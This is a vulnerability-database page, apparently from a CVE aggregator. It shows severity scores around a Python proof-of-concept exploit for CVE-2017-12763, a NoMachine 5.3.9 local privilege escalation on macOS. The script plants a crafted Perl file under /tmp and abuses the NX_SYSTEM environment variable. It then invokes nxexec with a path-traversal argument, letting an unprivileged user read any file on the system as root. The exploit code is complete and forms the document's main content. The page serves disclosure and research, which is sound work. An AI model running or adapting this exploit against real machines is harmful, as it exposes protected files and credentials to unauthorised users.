9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.9 High
AI Score
Confidence
High
0.007 Low
EPSS
Percentile
79.6%
"""
# Exploit Title: NoMachine LPE - Local Privilege Escalation
# Date: 09/08/2017
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: https://www.nomachine.com
# Software Link: https://www.nomachine.com
# Version: 5.3.9
# Tested on: OSX
# CVE : CVE-2017-12763
NoMachine uses a file called nxexec in order to execute different action as super user, nxexec allow to execute
sh files within a sandboxed path, additionally other checks such as parent process name, parent process path are
performed in order to be sure only NoMachine application are allowed to execute nxexec.
nxnode.bin allow to spoof a local path via NX_SYSTEM environment variable, this is use to craft a path where a perl
file will be executed, this PoC exploit the NX_SYSTEM variable in order to allow a custom perl file to call nxexec
and execute privileged nxcat.sh script in order to read any file on filesystem.
"""
import os
import sys
print "[!] NoMachine - EoP - Read any file by @dzonerzy"
if len(sys.argv) == 4:
nxnode = sys.argv[1]
nxexec = sys.argv[2]
toread = sys.argv[3]
user = os.environ.get("USER")
tmp_path = "/tmp/lib/perl/nxnode"
tmp_file = "/tmp/lib/perl/nxnode/nxnode.pl"
tmp_file_content = "print \"[*] Exploiting vulnerability\\n\";" \
"system(\"{0} " \
"nxcat.sh 1 {1} 2 '../../../../../..{2}'\");".format(nxexec, user, toread)
print "[*] Crafting tmp environment"
os.system("mkdir -p {0}".format(tmp_path))
with open(tmp_file,"w") as tmp:
tmp.write(tmp_file_content)
tmp.close()
os.system("NX_SYSTEM=/tmp {0}".format(nxnode))
os.unlink(tmp_file)
os.system("rm -r /tmp/lib")
else:
print "Usage: {0} <path of nxnode.bin> <path of nxexec> <file to read>".format(sys.argv[0])
9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.9 High
AI Score
Confidence
High
0.007 Low
EPSS
Percentile
79.6%